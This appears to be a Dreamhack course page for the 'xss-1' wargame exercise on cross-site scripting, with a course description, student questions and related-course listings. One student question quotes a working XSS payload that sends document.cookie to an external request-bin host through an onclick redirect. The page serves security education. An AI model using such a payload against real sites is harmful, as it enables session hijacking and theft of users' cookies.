강의 설명

드림핵 워게임 문제 중 xss-1을 풀이하기 위해서는 XSS에 대한 이해가 필요합니다.

워게임 문제를 풀어보면서 XSS에 대한 이해를 높여봅니다.

강의 목표
문제 풀이를 통한 XSS의 이해
이 강의와 관련된 질문들입니다.
2개의 질문
웹 서버 사용하는 방법에 대해 질문드립니다.
외부에서 접근 가능한 웹 서버라는 게 정확히 무슨 뜻인가요? http://RANDOMHOST.request.dreamhack.games/?memo= 는 드림핵 워게임에서만 쓸 수 있나요?
#웹해킹
#문제풀이
외부 웹으로 쿠키 탈취법
코드를 http://host2.dreamhack.games:21402/vuln?param=<div onclick=location.href="https://qiwzdfr.request.dreamhack.games/?memo=" + document.cookie;>클릭</div> 이렇게 작성해서 외부 웹으로 정보가 도착한 것도 확인했는데 FLAG 값만 여백으로 남아있습니다. 왜 그런 것인가요?
#웹해킹
#문제풀이
이 강의가 포함된 로드맵
Web Hacking
10개의 스테이지 · 53개의 목표
9.8★ (380)
Free
드림핵이 추천하는 강의입니다.
같이 들으면 좋은 강의
Exercise: File Vulnerability
0.0★ (0)
Free
Exercise: SSRF
0.0★ (0)
Free
Exercise: CSRF
0.0★ (0)
Free
Exercise: Blind SQL Injection
0.0★ (0)
Free
강의 평점
0.0★ (0)
0
Exercise: XSS
0.0★ (0)
Free
강의 시작
상세정보
약 2 hours 소요
쉬운 난이도
Python